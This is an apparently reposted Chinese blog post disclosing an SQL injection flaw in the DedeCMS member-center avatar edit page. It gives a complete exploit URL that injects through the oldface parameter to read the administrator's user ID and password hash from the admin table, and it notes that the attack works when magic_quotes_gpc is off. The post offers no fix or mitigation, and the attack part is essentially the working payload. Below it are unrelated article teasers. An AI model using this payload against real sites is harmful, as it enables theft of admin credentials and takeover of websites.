DedeCMS会员中心头像修改SQL注射漏洞

网站建设评论49

作者:c4rp3nt3r

主页:http://www.0x50sec.org

DedeCMS会员中心头像修改SQL注射0day漏洞

同样需要 magic_quotes_gpc = Off ,成功利用此漏洞可获得管理员密码

漏洞参数 oldspacelogo SQL注射

http://bt/de/member/edit_face.php?dopost=save&oldface=/de/uploads/userup/3/eee.jpg%27and%20@%60%27%60,face=%28select%20concat%28userid,0x3a,pwd%29%20from%20%60%23@__admin%60%20limit%201%29,joinip=\'1

该文章由WP-AutoPost插件自动采集发布

原文地址:http://bluereader.org/article/23968082

 
网站建设

微软宣布Windows 2003将停止更新

微软在去年曾宣布WinXP系统寿终正寝,不再对它进行更新维护,如今终于轮到了Windows 2003了。2015年7月14日,这款被广泛部署于服务器的微软操作系统也将停止更新。Windows 2003...
42评论
营销型网站建设事项和网络推广优点 网站建设

营销型网站建设事项和网络推广优点

营销型网站对于一个企业来说至关重要,它是让互联网用户找到你,了解你,并成为企业客户的重要载体,当前,营销型网站对于各行各业的企业来说已经不陌生了,而且有不少企业通过营销型网站获得了良好的成效,但是,你...
48评论
网站建设

深度:关于社会工程学攻击的一次探索(上)

在这篇文章中将讨论社会工程学攻击,很明显,首先遇到的问题就是:“什么是社会工程学”和“这些攻击有那些类型”。当然更有趣的是本文中将介绍使用者些技巧的黑客而不是使用像SET的方式攻击。本文的目标是展现一...
26评论
匿名

发表评论

匿名网友
:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: